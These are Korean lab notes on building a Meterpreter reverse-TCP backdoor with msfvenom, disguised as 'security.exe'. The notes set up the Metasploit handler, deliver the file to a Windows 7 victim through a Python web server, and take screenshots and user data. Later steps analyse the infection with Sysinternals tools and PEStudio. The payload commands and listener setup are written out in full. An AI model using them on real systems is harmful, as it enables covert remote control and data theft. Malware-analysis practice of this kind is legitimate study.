msfvenom을 이용해서 악성코드 exe파일을 만들 예정 그 후 windows7 환경에다가 감염시킬것임(백도어 역할의 RAT 악성코드)
RAT: RemoteAccessToolkit
원격으로 접근할 수 있는 도구들
1) 메타스플로잇 프레임워크 사용하기 위해서 DB를 초기화 -> 처음한번만 함
2) 메타스플로잇 DB 시작(postgresql) -> 매번시작할때 함
3) 메타스플로잇 사용 -> 악성코드의 연결된 접점(핸들러 역할)
4) x86대상으로 미터프리터기능 사용 LHOST는 악성코드의 서버임
sudo msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.2.15 LPORT=7777 -f exe -o security.exe
LHOST = 자기주소(공격자의 IP)
LPORT = 자기거(공격자의 포트)
-f : 파일형식지정(exe)
악성서버: 칼리리눅스
security.exe(악성코드: ip및 포트 설정) -> 희생자에게 배포예정(windows7)
exe windows7에서 설치하고 실행하면 역으로 악성서버 IP와 포트로 접속한다(Reverse TCP)
5) 핸들러 파일을 만든다(windows7에서 실행하면 이제 제어할 수 있음)
악성코드 배포전
- use exploit/multi/handler
- set payload windows/meterpreter/reverse_tcp
-> 이형태를 기다리겠다. - set LHOST 10.0.2.15
-> 악성코드 만든것과 동일 - set LPORT 7777
-> 악성코드 만든것과 동일 - exploit
6) 파이썬 웹서버를 만들어서 악성코드 배포한다.(security.exe)
1. sudo python3 -m http.server
8000포트에서 실행되고 있다.
- 이 상태에서 Windows7에서 10.0.2.15:8000에 접속한다.
-
security.exe를 다운받고 동작시킨다.(배포 완료)
-
windows7에서 프로세스모니터와 프로세스 익스플로러를 실행한다(이때부터 해야함)
7) 칼리리눅스의 메타스플로잇창 들어가서 확인한다.
-> 세션연결된것 볼 수 있음
1. getuid(명령어)
-> 감염된 사용자 정보
-
screenshare
-> 사용자의 정보들을 모은다. -
screenshot
-> 화면캡처 가능 -
dir
-> 윈도우즈가 다운로드 받았던 파일들 볼 수 있음
8) 프로세스익스플로러를 본다.
-> explorer.exe 하위에 존재한다.
- security.exe우클릭해서 속성본다.
-> cmd.exe동작하고 있음
-> 연결된 정보 볼 수 있음
9) 프로세스모니터를 본다.
1. security 포함으로 필터를 건다.
- 파일다운로드 경로, dll, 터미널서비스 등 확인
- 프리패치파일(pf)은 어떤 프로그램 실행했는지 분석목적으로 분석가능
1> 파일다운로드 받았던 exe파일 경로 나온다.
2> 커널관련 dll파일도 가지고 온다.
3> 터미널 서비스는 원격으로 접속할때 사용함, security.exe는 터미널 서버를 사용하는 정보를 가지고 있다.
- IP관련 dll파일들도 볼수 있다.
윈도우즈 소켓파일들을 다운로드 받은 적이 없는데 CreatFile로 WSOCK32.dll을 가지고온다. -> why? : exe파일 실행시키면 이거까지 다운로드 받아서 실행한다.
- 명령어를 실행할때마다 event들이 계속 발생한다.
- windows Temp파일 경로를 상당히 많이 사용함
-> 필터를 Path로 걸면 더 쉽게 볼 수 있다.
10) Autoruns를 본다.
-> 서비스에 뭐가 등록되어있는가 시작프로그램 확인할 수 있음
-
Logon보면 시작프로그램 확인 할 수 있음
-> 확인해보니 등록된거 없음 -
Scheduled Tasks
-> 정기적으로 하는거 등록함 -
Services
-> 혹시나 의심되는거 심어저 있는가 확인
11) dll파일등을 정적분석을 한다.(PEStudio)
